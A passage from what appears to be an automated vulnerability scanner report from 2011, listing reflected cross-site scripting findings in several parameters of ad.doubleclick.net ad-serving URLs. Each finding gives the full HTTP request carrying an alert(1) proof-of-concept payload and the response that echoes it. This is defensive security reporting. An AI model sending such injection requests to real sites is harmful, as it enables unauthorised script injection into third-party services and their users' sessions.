The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5286c"-alert(1)-"52e38c0e3f5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!5286c"-alert(1)-"52e38c0e3f5&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8139

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
0.2mdn.net/1676624/20DR_Button_Orange_728x90.gif";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!5286c"-alert(1)-"52e38c0e3f5&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/c%3B232789996%3B3-0%3B0%3B56669790
...[SNIP]...

5.30. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91be2"-alert(1)-"08c3a9c4724 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=817380091be2"-alert(1)-"08c3a9c4724&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=817380091be2"-alert(1)-"08c3a9c4724&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/
...[SNIP]...

5.31. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c70"-alert(1)-"093128206cf was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=192992137780c70"-alert(1)-"093128206cf&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=192992137780c70"-alert(1)-"093128206cf&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs
...[SNIP]...

5.32. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62386"-alert(1)-"8c43c31d0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f492162386"-alert(1)-"8c43c31d0&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37132

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
s.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f492162386"-alert(1)-"8c43c31d0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/db/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";

...[SNIP]...

5.33. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92029"-alert(1)-"8fa74e1bff2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB92029"-alert(1)-"8fa74e1bff2&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB92029"-alert(1)-"8fa74e1bff2&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3f";

...[SNIP]...

5.34. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2466"-alert(1)-"9855290f93a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838c2466"-alert(1)-"9855290f93a&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
(('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838c2466"-alert(1)-"9855290f93a&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/
...[SNIP]...

5.35. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a37e5"-alert(1)-"e3e4812a691 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=Ga37e5"-alert(1)-"e3e4812a691&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=Ga37e5"-alert(1)-"e3e4812a691&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B
...[SNIP]...

5.36. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3154a"-alert(1)-"6f2ae5e4955 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=3154a"-alert(1)-"6f2ae5e4955 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37138
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:42:13 GMT
Expires: Tue, 26 Apr 2011 18:42:13 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
hUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=3154a"-alert(1)-"6f2ae5e4955http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";
t
...[SNIP]...

5.37. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b3a6"-alert(1)-"763dbf5867a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!5b3a6"-alert(1)-"763dbf5867a&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
)
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!5b3a6"-alert(1)-"763dbf5867a&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B6011322
...[SNIP]...

5.38. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc29d"-alert(1)-"63a898666d6 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801fc29d"-alert(1)-"63a898666d6&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36947

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801fc29d"-alert(1)-"63a898666d6&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/2
...[SNIP]...

5.39. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 970af"-alert(1)-"c3c5aa073d6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037970af"-alert(1)-"c3c5aa073d6&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037970af"-alert(1)-"c3c5aa073d6&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs
...[SNIP]...

5.40. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc82d"-alert(1)-"c81877f4178 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83fc82d"-alert(1)-"c81877f4178&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
is.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83fc82d"-alert(1)-"c81877f4178&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";

...[SNIP]...

5.41. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae172"-alert(1)-"f6eedac639f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXTae172"-alert(1)-"f6eedac639f&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
